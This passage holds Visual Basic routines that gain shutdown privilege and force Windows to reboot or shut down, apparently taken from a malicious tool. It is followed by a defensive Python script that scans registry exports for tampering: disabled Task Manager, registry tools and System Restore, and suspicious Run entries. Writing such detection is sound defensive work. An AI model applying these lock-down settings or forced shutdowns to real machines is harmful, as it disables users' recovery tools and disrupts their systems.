Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess
As Long, TokenHandle As Long) As Long
Public Declare Function
LookupPrivilegeValue Lib "advapi32" Alias
"LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName
As String, lpLuid As LUID) As Long
Public Declare Function
AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long,
ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal
BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long)
As Long
Public Declare Function GetCurrentProcess
Lib "kernel32" () As Long
Public Declare Function GetVersionEx Lib
"kernel32" Alias "GetVersionExA" (lpVersionInformation As
OSVERSIONINFO) As Long
Public Const EWX_FORCE = 4
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Const VER_PLATFORM_WIN32_NT = 2
Public Const ANYSIZE_ARRAY = 1
Public Const TOKEN_ADJUST_PRIVILEGES =
&H20
Public Const TOKEN_QUERY = &H8
Public Const SE_PRIVILEGE_ENABLED = &H2
Public Type LUID
LowPart As Long
HighPart As Long
End Type
Public Type LUID_AND_ATTRIBUTES
pLuid As LUID
Attributes As Long
End Type
Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As
LUID_AND_ATTRIBUTES
End Type
Public Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
'Reboot Windows(Not WinNT)
Public Function Reboot() As Long
'On Error Resume Next
LogOff = ExitWindowsEx(EWX_FORCE Or
EWX_REBOOT, 0)
End Function
'Shutdown Windows(Not WinNT)
Public Function Shutdown() As Long
'On Error Resume Next
LogOff = ExitWindowsEx(EWX_FORCE Or
EWX_SHUTDOWN, 0)
End Function
'Detection WinNT
Public Function IsWinNT() As Boolean
'On Error Resume Next
Dim myOS As OSVERSIONINFO
myOS.dwOSVersionInfoSize = Len(myOS)
GetVersionEx myOS
IsWinNT = (myOS.dwPlatformId =
VER_PLATFORM_WIN32_NT)
End Function
'For Get Privileges from Win NT
Public Sub EnableShutDown()
'On Error Resume Next
Dim hProc As Long
Dim hToken As Long
Dim mLUID As LUID
Dim mPriv As TOKEN_PRIVILEGES
Dim mNewPriv As TOKEN_PRIVILEGES
hProc = GetCurrentProcess()
OpenProcessToken hProc, TOKEN_ADJUST_PRIVILEGES
+ TOKEN_QUERY, hToken
LookupPrivilegeValue "",
"SeShutdownPrivilege", mLUID
mPriv.PrivilegeCount = 1
mPriv.Privileges(0).Attributes =
SE_PRIVILEGE_ENABLED
mPriv.Privileges(0).pLuid = mLUID
'Setting Privileges windows NT
AdjustTokenPrivileges hToken, False, mPriv,
4 + (12 * mPriv.PrivilegeCount), mNewPriv, 4 + (12 * mNewPriv.PrivilegeCount)
End Sub
' Reboot For WinNT
Public Sub RebootNT(Force As Boolean)
Dim Flags As Long
Flags = EWX_REBOOT
If Force Then Flags = Flags + EWX_FORCE
If IsWinNT Then EnableShutDown
ExitWindowsEx Flags, 0
End Sub
' Shutdown For WinNT
Public Sub ShutdownNT(Force As Boolean)
Dim Flags As Long
Flags = EWX_SHUTDOWN
If Force Then Flags = Flags + EWX_FORCE
If IsWinNT Then EnableShutDown
ExitWindowsEx Flags, 0
End Sub
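Added example (not part of the original post, and not code from the tool or its author): a triage script, written from the defender's side, that scans the text of a registry export (.reg format) for the registry changes the VBS and VB listings above make: the Policies lock-down values, Run entries that point at script or batch files or at an executable dropped in the Windows folder, and a changed exefile description. The sample export and every name in it are constructed for illustration, and the Run-key rules are heuristics (assumptions), not a complete detection.

```python
import re

# Lower-case key suffixes; matching on the suffix covers HKCU, HKLM and HKEY_USERS\<SID>.
CV = r"\software\microsoft\windows\currentversion"
POL = CV + r"\policies"
SR = r"\software\policies\microsoft\windows nt\systemrestore"
# (key suffix, value name) -> DWORD written by the listings to disable recovery tools.
TAMPER_VALUES = {
    (POL + r"\system", "disabletaskmgr"): 1,
    (POL + r"\system", "disableregistrytools"): 1,
    (POL + r"\explorer", "nofolderoptions"): 1,
    (POL + r"\explorer", "norun"): 1,
    (POL + r"\explorer", "nofind"): 1,
    (POL + r"\explorer", "nocontrolpanel"): 1,
    (SR, "disablesr"): 1,
    (SR, "disableconfig"): 1,
    (r"\software\policies\microsoft\windows\installer", "disablemsi"): 1,
}
RUN_SUFFIXES = (CV + r"\run", CV + r"\runonce")
# Heuristic (assumption): autostart entries rarely point at these file types.
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "bat", "cmd", "htm", "html"}

KEY_RE = re.compile(r"^\[(-?)(.+)\]$")
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
EXT_RE = re.compile(r'\.([A-Za-z0-9]{2,4})(?=$|["\s])')
WINROOT_EXE_RE = re.compile(r'^"?[a-z]:\\windows\\[^\\"]+\.exe\b', re.I)


def _unescape(s):
    # .reg files escape backslash and double quote with a backslash.
    return re.sub(r"\\(.)", lambda m: m.group(1), s)


def parse_reg_export(text):
    """Yield (key, value_name, data) from .reg text (decode UTF-16 files first).

    data is an int for dword values, a str for strings, None for other types;
    a key's default value is reported with the name "".
    """
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = KEY_RE.match(line)
        if m:
            key = None if m.group(1) else m.group(2)  # "[-KEY]" is a deletion
            continue
        m = VALUE_RE.match(line)
        if key is None or not m:
            continue  # header line or continuation of a multi-line hex value
        name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        rhs = m.group(2)
        if rhs.startswith("dword:"):
            data = int(rhs[6:], 16)
        elif len(rhs) >= 2 and rhs[0] == '"' and rhs[-1] == '"':
            data = _unescape(rhs[1:-1])
        else:
            data = None
        yield key, name, data


def audit(text):
    """Return a list of (rule, key, value_name, data) findings."""
    findings = []
    for key, name, data in parse_reg_export(text):
        lkey, lname = key.lower(), name.lower()
        for (suffix, vname), bad in TAMPER_VALUES.items():
            if lname == vname and lkey.endswith(suffix) and data == bad:
                findings.append(("policy-lockdown", key, name, data))
        if lkey.endswith(RUN_SUFFIXES) and isinstance(data, str):
            ext = EXT_RE.search(data)
            if ext and ext.group(1).lower() in SCRIPT_EXTS:
                findings.append(("run-script", key, name, data))
            elif WINROOT_EXE_RE.match(data):
                findings.append(("run-exe-in-windows-root", key, name, data))
        if (lkey.endswith(r"\exefile") and name == ""
                and isinstance(data, str) and data != "Application"):
            findings.append(("exefile-description-changed", key, name, data))
    return findings


# Constructed sample export; none of these names come from a real system.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFolderOptions"=dword:00000001
"NoDriveTypeAutoRun"=dword:00000091

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore]
"DisableSR"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TrayApp"="\"C:\\Program Files\\Vendor\\tray.exe\" /min"
"Updater"="C:\\WINDOWS\\startup_note.vbs"
"Helper"="C:\\WINDOWS\\helper123.exe"

[HKEY_CLASSES_ROOT\exefile]
@="Media file"
'''

if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print(finding)
```

The Explorer "Hidden", "HideFileExt" and "ShowSuperHidden" values that the listings also write are left out of the table because the values written match common default settings and would flag clean machines.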